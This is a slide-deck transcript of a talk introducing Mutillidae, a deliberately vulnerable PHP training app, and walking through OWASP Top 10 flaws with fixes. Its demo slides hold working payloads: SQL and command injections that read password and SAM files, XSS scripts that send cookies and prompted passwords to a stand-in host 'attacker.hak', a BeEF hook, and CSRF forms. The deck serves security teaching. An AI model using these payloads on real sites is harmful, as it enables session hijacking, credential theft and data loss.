1 / 36

Mutillidae : A Deliberately Vulnerable Set Of PHP Scripts That Implement The OWASP Top 10

Mutillidae : A Deliberately Vulnerable Set Of PHP Scripts That Implement The OWASP Top 10. Adrian Crenshaw. About Adrian. I run Irongeek.com I have an interest in InfoSec education I don’t know everything - I’m just a geek with time on my hands

Download Presentation

Mutillidae : A Deliberately Vulnerable Set Of PHP Scripts That Implement The OWASP Top 10

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. Mutillidae: A Deliberately Vulnerable Set Of PHP Scripts That Implement The OWASP Top 10 Adrian Crenshaw

  2. About Adrian • I run Irongeek.com • I have an interest in InfoSec education • I don’t know everything - I’m just a geek with time on my hands • I’m also not a professional web developer, creating crappy code was easy for me.  • So why listen to me? Sometimes it takes a noob to teach a noob.

  3. So, what is this talk about? • OWASP Top 10http://www.owasp.org/index.php/OWASP_Top_Ten_ProjectAs a side note, I’ve copied (Ligatted) quite of few of their descriptions and fixes into this presentation • Mutillidaehttp://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10 • Samurai WTFhttp://samurai.inguardians.com/ • Ok, but what are those?

  4. The OWASP Top 10 The OWASP Top Ten represents a broad consensus about what the most critical web application security flaws are. The 2010 list includes: • A1: Injection • A2: Cross-Site Scripting (XSS) • A3: Broken Authentication and Session Management • A4: Insecure Direct Object References • A5: Cross-Site Request Forgery (CSRF) • A6: Security Misconfiguration • A7: Insecure Cryptographic Storage • A8: Failure to Restrict URL Access • A9: Insufficient Transport Layer Protection • A10: Unvalidated Redirects and Forwards

  5. What’s Mutillidae? • A teaching tool for illustrating the OWASP 10 • Written in PHP/MySQL • Meant to be simpler than WebGoat • Simple to exploit, just to get the concept across • Easy to reset • Includes a “Tips” function to help the student

  6. Samurai WTF • Live CD meant to be a “Web Testing Framework” • Made by some guys at Inguardians Kevin Johnson Justin Searle Frank DiMaggio • If you want a more general network pentestingdistro, look at Backtrack 4http://www.backtrack-linux.org/

  7. Installing Mutillidae for the lazy • Download Mutillidae http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10 • Grab XAMPP Lite and install ithttp://www.apachefriends.org/en/xampp.html • Put the Mutillidae files into a web accessible directory ( \htdocs on XAMPP) • May want to edit mutillidae/.htaccess to decide who can access it • Put your MySQL config information into mutillidae/config.inc

  8. ESAPI (OWASP Enterprise Security API) • Lovely set of libraries to help implement fixes like proper escaping, parameterization and such.http://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API • Supported platforms:Java 1.4.4 Java 2.0 .NET Classic ASP PHP ColdFusion & CFML PythonJavascript

  9. A1 - Injection Injection flaws, particularly SQL injection, are common in web applications. Injection occurs when user-supplied data is sent to an interpreter as part of a command or query. The attacker's hostile data tricks the interpreter into executing unintended commands or changing data.

  10. Example The Code: “SELECT * FROM accounts WHERE username='". $username ."' AND password='".stripslashes($password).”’” or echo shell_exec("nslookup " . $targethost);'“ Expected to fill in the string to: SELECT * FROM accounts WHERE username=‘adrian' AND password=‘somepassword’ or Nslookupirongeek.com But what if the person injected: SELECT * FROM accounts WHERE username=‘adrian' AND password=‘somepassword’ or 1=1 -- ’ or Nslookupirongeek.com && del *.*

  11. Demo Time!!! • Simple SQL Injection:' or 1=1 -- • Wish I could do this, but can't stack in MySQL/PHP '; DROP TABLE owasp10; -- • Command Injections (for Windows):&& dir&& wmic process list&& wmicuseraccount list&& copy c:\WINDOWS\repair\sam && copy c:\WINDOWS\repair\system.bak • Command Injections (for *nix):;ls;whoami;cat /etc/passwd;nmap –A target.hak

  12. Links • SQL Injection Cheat Sheethttp://ferruh.mavituna.com/sql-injection-cheatsheet-oku/ • SQL Injection Attacks by Example http://unixwiz.net/techtips/sql-injection.html • Command line Kung Fuhttp://blog.commandlinekungfu.com/

  13. Fixes • Input validation. • Use strongly typed parameterized query APIs (bound parameters). • Enforce least privilege. • Avoid detailed error messages. • Show care when using stored procedures. • Do not use dynamic query interfaces. • Do not use simple escaping functions. • Watch out for canonicalization errors.

  14. A2 - Cross Site Scripting (XSS) XSS flaws occur whenever an application takes user supplied data and sends it to a web browser without first validating or encoding that content. XSS allows attackers to execute script in the victim's browser which can hijack user sessions, deface web sites, possibly introduce worms, etc.

  15. Demo Time!!! • Simple:<script>alert("XSS");</script> • Page Redirect:<script>window.location = "http://www.irongeek.com/"</script> • Cookie Stealing:<script>new Image().src="http://attacker.hak/mutillidae/catch.php?cookie="+encodeURI(document.cookie);</script>

  16. Demo Time!!! • Simple:<script>alert("XSS");</script> • Page Redirect:<script>window.location = "http://www.irongeek.com/"</script> • Cookie Stealing:<script>new Image().src="http://attacker.hak/mutillidae/ccatch.php?cookie="+encodeURI(document.cookie);</script> • Password Con:<script>username=prompt('Please enter your username',' ');password=prompt('Please enter your password',' ');document.write("<imgsrc=\"http://attacker.hak/mutillidae/catch.php?username="+username+"&password="+password+"\">");</script>

  17. Demo Time!!! • External Javascript:<script src="http://ha.ckers.org/xss.js"></script> • Hot BeEF Injection:<script language='Javascript'src='http://attacker.hak/beef/hook/beefmagic.js.php'></script> • How about the User Agent string?

  18. Links • Mangle XSS to bypass filters: http://ha.ckers.org/xss.html • BeEF browser exploitation frameworkhttp://www.bindshell.net/tools/beef • XSS Me Firefox pluginhttps://addons.mozilla.org/en-US/firefox/addon/7598 • Exotic Injection Vectors http://www.irongeek.com/i.php?page=security/xss-sql-and-command-inject-vectors

  19. Fixes • Input validation. • Strong output encoding. htmlspecialchars() • Specify the output encoding. • Do not use "blacklist" validation to detect XSS in input or to encode output. • Watch out for canonicalization errors.

  20. A3 - Broken Authentication and Session Management Account credentials and session tokens are often not properly protected. Attackers compromise passwords, keys, or authentication tokens to assume other users' identities.

  21. Demo time!!! • This can be very application specific • For Mutillidae: Let’s Edit A Cookie!

  22. Links • Edit Cookies Pluginhttps://addons.mozilla.org/en-US/firefox/addon/4510 • Tamper Data Firefox Pluginhttps://addons.mozilla.org/en-US/firefox/addon/966

  23. Things too look out for • The primary assets to protect are credentials and session IDs. • 1. Are credentials always protected when stored using hashing or encryption? See A7. • 2. Can credentials be guessed or overwritten through weak account management functions (e.g., account creation, change password, recover password, weak session IDs)? • 3. Are session IDs exposed in the URL (e.g., URL rewriting)? • 4. Are session IDs vulnerable to session fixation attacks? • 5. Do session IDs timeout and can users log out? • 6. Are session IDs rotated after successful login? • 7. Are passwords, session IDs, and other credentials sent only over TLS connections?

  24. Fixes The primary recommendation for an organization is to make available to developers: A single set of strong authentication and session management controls. Such controls should strive to: a) meet all the authentication and session management requirements defined in OWASP’s Application Security Verification Standard(ASVS) areas V2 (Authentication) and V3 (Session Management). b) have a simple interface for developers. Consider the ESAPI Authenticator and User APIsas good examples to emulate, use, or build upon. 2. Strong efforts should also be made to avoid XSS flaws which can be used to steal session IDs.

  25. A4 - Insecure Direct Object Reference A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, database record, or key, as a URL or form parameter. Attackers can manipulate those references to access other objects without authorization.

  26. Demo Time!!! • In the old version, you would have already seen it with the malicious file include demo. This time, let got look at the: Source viewerand in case you think POST will save you Text file viewer

  27. Fixes • Avoid exposing your private object references to users whenever possible, such as primary keys or filenames. • Validate any private object references extensively with an "accept known good" approach. • Verify authorization to all referenced objects.

  28. A5 - Cross Site Request Forgery (CSRF) A CSRF attack forces a logged-on victim's browser to send a pre-authenticated request to a vulnerable web application, which then forces the victim's browser to perform a hostile action to the benefit of the attacker. CSRF can be as powerful as the web application that it attacks.

  29. CSRF/XSRF Illustration Session established with web app via a cookie. (already logged in) At some later point, content that the attacker controls is requested. Attacker serves up content that asks client’s browser to make a request. Client makes request, and since it already has a session cookie the request is honored. Website the attacker controls Target Web App 3 1 4 2 Client

  30. Demo Time!!! • Let’s visit a page with this lovely link: <imgsrc="http://target.hak/mutillidae/index.php?page=add-to-your-blog.php&input_from_form=hi%20there%20monkeyboy"> • Don’t want to use a bad image? Try an iframe: <iframesrc="http://target.hak/mutillidae/index.php?page=add-to-your-blog.php&input_from_form=hi%20there%20monkeyboy"" style="width:0px; height:0px; border: 0px"></iframe> • Can’t use the GET method? Try something like:<html> <body><form name="csrfform" method="post" action="http://target.hak/mutillidae/index.php?page=add-to-your-blog.php"><input type='hidden' name='input_from_form' value="Test of an auto submitted form."></form><script>document.csrfform.submit()</script> </body></html>

  31. Links • CSRF Flaws Found On Major Websites, Including a Bank http://it.slashdot.org/article.pl?sid=08/09/30/0136219 • CSRF Home Router Funhttp://www.gnucitizen.org/blog/persistent-xss-and-csrf-on-wireless-g-adsl-gateway-with-speedbooster-wag54gs/ • CSRF in Gmailhttp://www.gnucitizen.org/blog/google-gmail-e-mail-hijack-technique/

  32. Fixes • For sensitive data or value transactions, re-authenticate or use transaction signing to ensure that the request is genuine. • Do not use GET requests (URLs) for sensitive data or to perform value transactions. (see next point) • POST alone is insufficient protection. • Consider adding Captchas and extra sessions values as hidden form elements.

  33. Other Projects Like Mutillidae • Deliberately Insecure Web Applications For Learning Web App Security http://www.irongeek.com/i.php?page=security/deliberately-insecure-web-applications-for-learning-web-app-security

  34. Useful tool collections/libraries • SamuraiWTFhttp://samurai.inguardians.com/ • OWASP Live CDhttp://www.owasp.org/index.php/Category:OWASP_Live_CD_Project • BackTrackhttp://www.remote-exploit.org/backtrack.html • ESAPI (OWASP Enterprise Security API)http://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API

  35. Events • Free ISSA classes • ISSA Meetinghttp://issa-kentuckiana.org/ • Louisville Infosechttp://www.louisvilleinfosec.com/ • Phreaknic/Notacon/Outerz0nehttp://phreaknic.infohttp://notacon.org/http://www.outerz0ne.org/

  36. Questions? 42

More Related